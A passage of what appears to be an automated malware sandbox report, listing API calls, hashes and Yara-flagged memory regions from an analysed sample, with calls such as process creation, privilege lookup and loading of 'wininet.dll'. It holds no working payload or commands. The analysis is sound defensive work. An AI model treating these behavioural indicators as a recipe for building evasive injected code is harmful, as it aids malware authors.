                                                                                                                • Opcode Fuzzy Hash: 2fbb3bea804fda819ef2aa364b8e2a2ff9d63bd8d83fc8cbb1cda8fc1a9a4137
                                                                                                                • Instruction Fuzzy Hash: D99002A124205017610571595414616441B97E4245B51C421E50055A1DC665E8D17165
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 68fb2e4cb9e40a87ad62206e3ef17b975030ef9a3860dada47e33e18c7d69e84
                                                                                                                • Instruction ID: 55b2402c184f998469f4bda34df891ec1ada622acae5d29b113640dd68afe946
                                                                                                                • Opcode Fuzzy Hash: 68fb2e4cb9e40a87ad62206e3ef17b975030ef9a3860dada47e33e18c7d69e84
                                                                                                                • Instruction Fuzzy Hash: 4D900265251050172105A5591704507045797D9395351C421F5006561CD761E8A16161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ef93f0c5e9760093171daa5ff44f8f256d83f231480bfae451d4252e2be98c9a
                                                                                                                • Instruction ID: 34e5bd24762cc6f90a3ca98033f68d350df082aec2c2523950b5a8f0322830a1
                                                                                                                • Opcode Fuzzy Hash: ef93f0c5e9760093171daa5ff44f8f256d83f231480bfae451d4252e2be98c9a
                                                                                                                • Instruction Fuzzy Hash: 85900265261050162145A559160450B0857A7DA395391C415F54075A1CC761E8A56361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 48d1e8a3197b9d385169c7e6d80d72a84b4f683d41096e85855bd43e75e28c3d
                                                                                                                • Instruction ID: 02ce622ed678f043135fa90fb61ce6b617dbaccb50af310b39a5add43b17c199
                                                                                                                • Opcode Fuzzy Hash: 48d1e8a3197b9d385169c7e6d80d72a84b4f683d41096e85855bd43e75e28c3d
                                                                                                                • Instruction Fuzzy Hash: 3890027124105856F10061595404B46041797E4345F51C416A4115665D8755E8917561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8db6a7c0b398928b81c0e661224e9b833cef9c32eb994c4883943d0908216b9e
                                                                                                                • Instruction ID: ce25676b32b694ba4948ede982b0b28d39060686f1beebd55dad3683f3db0db5
                                                                                                                • Opcode Fuzzy Hash: 8db6a7c0b398928b81c0e661224e9b833cef9c32eb994c4883943d0908216b9e
                                                                                                                • Instruction Fuzzy Hash: 6D9002712410D816F1106159940474A041797D4345F55C811A8415669D87D5E8D17161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 02B28D08
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 02B28D08
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A27D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,00000000,02B13A1A,00000000), ref: 02B22757
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,00000000,02B13A1A,00000000), ref: 02B22757
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1834A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1836B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1834A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1836B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B1AD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B1F030,?,?,00000000), ref: 02B28DCC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1B2,02B1F1B2,?,00000000,?,?), ref: 02B2A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02B24516,?,02B24C8F,02B24C8F,?,02B24516,?,?,?,?,?,00000000,00000000,?), ref: 02B2A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1B2,02B1F1B2,?,00000000,?,?), ref: 02B2A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction ID: d11a7a4f0b271062a5a9ae9461e0257fc61583c4dd62f37aab77da60b01d8564
                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction Fuzzy Hash: 83E01AB12002186BDB10DF49CC84EE777ADAF88650F018154BA0C57241C934E8148BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A27D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 80865df76ddddb849f8c1896b1936e17afd15524ebe015052558beddeb27c303
                                                                                                                • Instruction ID: be095a757c6ad27f0b74adb1626a15609b589fdd1f82c3ac3edc6339905d2492
                                                                                                                • Opcode Fuzzy Hash: 80865df76ddddb849f8c1896b1936e17afd15524ebe015052558beddeb27c303
                                                                                                                • Instruction Fuzzy Hash: 44D023712441105BD341DB94DDC44FD7715DF84D35339015ADCEC4E00AC51084474780
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,02B18CF4,?), ref: 02B1F6DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                • Instruction ID: 653a0c93eecea5a7981dbdb81bd79a00c5c44ac975e61ad52cb931d677bdc4bd
                                                                                                                • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                • Instruction Fuzzy Hash: 28D0A7717503043BF610FAA49C03F3732CD9B54B44F4900A4F94CD77C3D950E0008965
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02B24516,?,02B24C8F,02B24C8F,?,02B24516,?,?,?,?,?,00000000,00000000,?), ref: 02B2A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 6bcd6b9f690a290d02cc1477972d82007d7c1926bf7f270aecbf26863e814f93
                                                                                                                • Instruction ID: e60b8a1c128efee71227c0802f341ef72e977e8358f1178216c07518bc750ada
                                                                                                                • Opcode Fuzzy Hash: 6bcd6b9f690a290d02cc1477972d82007d7c1926bf7f270aecbf26863e814f93
                                                                                                                • Instruction Fuzzy Hash: 88C012B10611202DE918FB5DB8428F2F35CDB8A215710EAAAE88D4692AD12284694AF3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8d8ba356c55041b8daf824817b7a8ccd038d3e35916132ee17ad6a0c4d9a75b9
                                                                                                                • Instruction ID: 4022963db78a54e5ed28d9dd7975000a0d7acee67e3f258ff3035d193f2f487e
                                                                                                                • Opcode Fuzzy Hash: 8d8ba356c55041b8daf824817b7a8ccd038d3e35916132ee17ad6a0c4d9a75b9
                                                                                                                • Instruction Fuzzy Hash: 65B02BB18010C0C9F700D76006087173D01B7C0300F12C051D1020341B0338E0C0F1B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E04D5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                				void* _t7;
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr* _t12;
                                                                                                                				intOrPtr* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				intOrPtr* _t15;
                                                                                                                
                                                                                                                				_t13 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_t14 =  *[fs:0x18];
                                                                                                                				_t15 = _t12;
                                                                                                                				_t7 = E04D0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                				_push(_t13);
                                                                                                                				E04D55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                				_t9 =  *_t15;
                                                                                                                				if(_t9 == 0xffffffff) {
                                                                                                                					_t10 = 0;
                                                                                                                				} else {
                                                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                				}
                                                                                                                				_push(_t10);
                                                                                                                				_push(_t15);
                                                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                				return E04D55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D5FDFA
                                                                                                                Strings
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D5FE01
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D5FE2B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: 8494689d9d5baed222ba46f4f575372e4d3d40608b4104bb2a90d84dc194bdd5
                                                                                                                • Instruction ID: dfb32b20a6fce79162ae2ca349c4864dbcaeb4f851dad07708f68b77db965aca
                                                                                                                • Opcode Fuzzy Hash: 8494689d9d5baed222ba46f4f575372e4d3d40608b4104bb2a90d84dc194bdd5
                                                                                                                • Instruction Fuzzy Hash: 3DF0F632200201BFEA251A45DC06F63BF5AEB44730F244314FA685A1E1EE62F86096F4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%